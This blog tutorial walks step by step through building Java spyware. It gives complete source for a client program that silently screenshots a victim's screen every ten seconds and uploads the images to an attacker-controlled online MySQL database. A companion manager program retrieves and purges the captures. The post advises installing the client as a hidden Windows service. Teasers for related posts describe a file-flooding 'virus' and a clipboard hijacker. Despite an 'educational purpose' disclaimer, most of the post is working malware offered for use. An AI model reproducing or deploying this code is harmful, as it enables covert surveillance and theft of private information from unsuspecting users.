Skip to main content

Creating a network spyware using java

By

According to wikipedia


Spyware is software that aims to gather information about a person or organization without their knowledge, that may send such information to another entity without the consumer's consent, or that asserts control over a device without the consumer's knowledge.
Spyware is basically used to transmit data from host's computer  to the hacker without their prior knowledge.


[Before Starting and going any deep in to the  topic i want to make it very clear that all the programs and coding describe below are for educational purpose only.If it causes any damage to the person who is using it or to the person on whom it is used author or the website takes no responsibility ]

Before Starting 


This tutorial will tell you everything which you will need to make a fully packed spy ware for yourself.
It will provide you with all the program codes and links to the required software's.

What all you need


Before starting here is a checklist of  tools and software you will be needed to make this spyware.

1)Java Development Kit(JDK)
2)MySQl connector for java.:- In order to use sql database in java program.
    NOTE :- you need not to have a MySQL database.If you have it then also it will never be needed.
3)Any java IDE.

Here i am assuming that you have install and configure everything listed above if you have found in any problem in doing so then you could google it.


Spyware's working


Our spyware is simple and could be made easily with less coding.It regularly takes screen capture after a specific interval (may be 5 sec to 10 min per screen shot depending upon database size)  of the client (where you have deploy the virus) and stores it on an online database which is administered by you.
There are two different programs which will work on two different platforms.
1) Our main virus program(Uploader.java) which will capture regular screen shot and upload it to database will run on the  client machine.
2) Our manager program(Manager.java) will run on our machine and it will regularly download the screenshot from database and cleans the database for new screenshots to be uploaded.


Need of an online free SQL database


I am sure that from our spyware working you could have guess out that this virus need a online database to function.Although there are many in the list you have to select a better and faster one with remote connections  available(most important) .
You could google it to find one for you or check this list for top hosting sites.But still i think you should use
Free SQL Database, however it provides only 5 MB of space but it is fast and reliable.

Once you have created you account you can create a database and an email will be send to you with the following details :-

Database Host            : -<Your database host>
Database  Username   :-<Your database username>
Database Password    :-<Your database password>

Just copy it somewhere as you will need it very often.


Designing Our Database 

Our database is very simple and contains only 1 table with 2 column (id ) and (imagedata) where id stores image index and data stores image itself.

Below in your account page there is a link for phpmyadmin click there a login form will be shown as below.



Where ,
                   server is Database Host
                   username is Database Username
                   and Password is Database password which you got from the Hosting site

Once you have successfully login  then on the menu tab ,select your database and then you will find (SQL) menu just click on it and run this sql code.



CREATE TABLE  `images` (
  `id` int(10) unsigned NOT NULL auto_increment,
 
  `image` longblob NOT NULL,
  PRIMARY KEY  (`id`)
);


This will create table images in your database with two columns id and image.

Here comes the end of database designing.

Programming client side virus,Uploder.java

This class uses the Robot class of java to capture screen shot and store it onto the database .
Here is the code for the Uploder.java file.






@author Quadgen -shashank sahu
package databaseVirus;

import java.awt.AWTException;
import java.awt.Dimension;
import java.awt.Rectangle;
import java.awt.Robot;
import java.awt.Toolkit;
import java.awt.image.BufferedImage;
import java.io.ByteArrayOutputStream;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.PreparedStatement;
import java.sql.SQLException;

import javax.imageio.ImageIO;


class Uploder
{  
   
    public static Connection getConnection()
     {
   
        String driver = "YOUR DATBASE HOST HERE";
    String url = "jdbc:mysql://<YOUR DATBSE HOST>:3306/<DATABASE USERNAME>";
    String u = "<DATABASE USERNAME>";
    String p = "<DATABASE PASSWORD>";
    try {
        Class.forName(driver);
    
    
      } catch (ClassNotFoundException e) {
        
        getConnection();
    }
    Connection conn = null;
    try {
        conn = DriverManager.getConnection(url, u, p);
      } 
    catch (SQLException e) {
    getConnection();
        
    }
    return conn;
  }
    static Connection conn;
    public static void main(String args[])throws Exception
    { 
                  conn = getConnection();
                  int fre=10000;//10 seconds, defines screen shot per 10 seconds
                while(true)
                   {
                       try{
                           
                        
                           
                           BufferedImage originalImage=getImage();
                          ByteArrayOutputStream    baos = new ByteArrayOutputStream();
                          ImageIO.write(originalImage, "jpg", baos);
                            byte[] imageInByte = baos.toByteArray();
                            String insertImageSql = "INSERT INTO "
                                         + "images(image)"
                                          + " VALUES(?)";
                                     PreparedStatement  preparedStatement = conn.prepareStatement(insertImageSql);
                                                preparedStatement.setBytes(1, imageInByte);
                                         preparedStatement.executeUpdate();
                                    
                                         Thread.sleep(fre);    
                                    
                           }
                                     
                        
                                     
                          catch(Exception e)
                             {
                                         continue;
                                     }
                                         
                                     
                                     
                   }
            
               
              
            }
       public static BufferedImage getImage() throws AWTException
       {
            Dimension screenDim = Toolkit.getDefaultToolkit().getScreenSize();
              Robot robot = null;
            
                robot = new Robot();
            


               BufferedImage image = robot.createScreenCapture(new Rectangle(0, 0, (int) screenDim.getWidth(),(int) screenDim.getHeight()));
               return image;

        
       
    }
        
        
  }
dfdfd

NOTE   

You have to enter your own Database USERNAME and PASSWORD as and when required.
 Also you could change the fre(frequency ) variable as per you requirement don't set it too low                         otherwise you will end your 5 MB space in a minute or two.(Remember 1sec=1000 milli seconds)
The above program is designed in a way if some error occur which might be no internet connection or library load failure or could not capture image or database space is full then it will automatically handel it and by entering into a infinite loop until the exception ends.(E.g. Internet Connection regained).


Programming manager program (Manager.java) 


This program will be executed by the hacker it will clean the database after successfully  downloading and storing  all the  screen shot uploaded by the client.

Manager.java




import java.io.FileOutputStream;
import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.SQLException;
import java.sql.Statement;





public class Manager
{
   static int start,end;
    
    public static Connection getConnection()  
     {
        String driver = "YOUR DATBASE HOST HERE";
        String url = "jdbc:mysql://<YOUR DATBSE HOST>:3306/<DATABASE USERNAME>";
        String u = "<DATABASE USERNAME>";
        String p = "<DATABASE PASSWORD>";
        try {
            Class.forName(driver);
        
        
          } catch (ClassNotFoundException e) {
            
            getConnection();
        }
        Connection conn = null;
        try {
            conn = DriverManager.getConnection(url, u, p);
          } 
        catch (SQLException e) {
        getConnection();
            
        }
        return conn;
  }
    static Connection conn;
public static void main()throws Exception
{
conn=getConnection();
Statement stmt = conn.createStatement();
ResultSet rs = stmt.executeQuery("SELECT * FROM images");
int id = 0;
 start=0;
    end=0;
if (rs.next() == false) {
        System.out.println("No image is found in database ");
      
    } 
    else {
start=rs.getInt(1);
        do {
          id = rs.getInt(1);
        byte[] image  = rs.getBytes(2);
        FileOutputStream fileOutputStream = new FileOutputStream("D:/"+id+".png");
    fileOutputStream.write(image);
System.out.println("\nImage successully retrieved from database. Id of image:"+ id );
        fileOutputStream.close();
        } while (rs.next());
      }
       end=id;
      String sql = "DELETE FROM images " +
                   "WHERE id<="+id+"";
         stmt.executeUpdate(sql);           
                System.out.print("deleted record "+start+" to "+id);    
System.out.print((id-start+1)+"files Downloaded");
                stmt.close();
rs.close();
conn.close();

}




}


Packaging and deploying

You could now easily convert your Uploder.java  program into a window service by the tools which are available on net.A window service could run on the host when the computer start and stops when the computer stops.It also runs on the background so there is no need for user interference.
Look here if you want to know how to do that.

Hope this help you if yes then tell more of your friends about it.Enjoy.
Happy Programming.
Also you could leave comment if you need any help from me.
Labels:

Comments

Post a Comment

Popular posts from this blog

Create a simple virus using java

By
What's my idea Before we start talking how we will create a simple flooder virus using java we must be clear about what is  the idea and how to implement it. So the idea is to create a program which will create  thousands of blank files in a drive you will don't believe but it could create file with  a speed of   1060+ files per second . How to implement it Now the problem is how we would do this?? So here is the answer .  First of all we will design a loop which will run  N  number of times where  N  is the number of files which we want to create. Then we will create a new File with the help of  createNewFile()  function of  java.io.File  class. The name of each file is the value of the variable which is used in the loop. Here is the sample virus program. /**  * **********This virus program is just for educational purpose   * author will not be responsible for any issues **************  *   * @author (Shashank
Post a Comment
Read more

Capturing Screen Shot using java

By
Here i will tell you how to write a program using java which is capable of capturing screenshots(either whole or partial).And save it as an image. Which java API ? The java.awt.Robot class provides a useful method for capturing a screenshot.Here is the method prototype. BufferedImage createScreenCapture(Rectangle screenRect) It is clear from the prototype that this function returns a BufferedImage and takes a Rectangle class object (portion of the screen to capture) as the argument.The BufferedImage which is returned could be saved using ImageIO class write method.Lets begin with the program. 1) Capturing full screen In order to capture full screen using  createScreenCapture(Rectangle screenRect) screenRect should have the full screen size and in order to do that we will use Toolkit class of java. Rectangle screenRect =  new Rectangle( Toolkit.getDefaultToolkit().getScreenSize() ); Now here begins the whole program. /* ***************
Post a Comment
Read more

Hijack Clipboard using java

By
What is Clipboard? The clipboard is a special location in your computer's memory that temporarily stores data that has been cut or copied from a document. This data can then be pasted to a new location. The clipboard will typically hold its information until you cut or copy something else, or log out of the computer. For example, a user may copy information from a word processor and paste that information into an e-mail message. What is Clipboard Hijack? A clipboard hijacking is an exploit in which the attacker gains control of the victim'sclipboard and replaces its contents with their own data, such as a link to a malicious Web site.For more details see  here . Hacking clipboard using java. Our java code will repeatedly change clipboard text with the hackers text, may be a irritating line ,or a URL to your site. We will use the Toolkit class to get the system clipboard and then we will use the Clipboard class to change the content of clipboard.
Post a Comment
Read more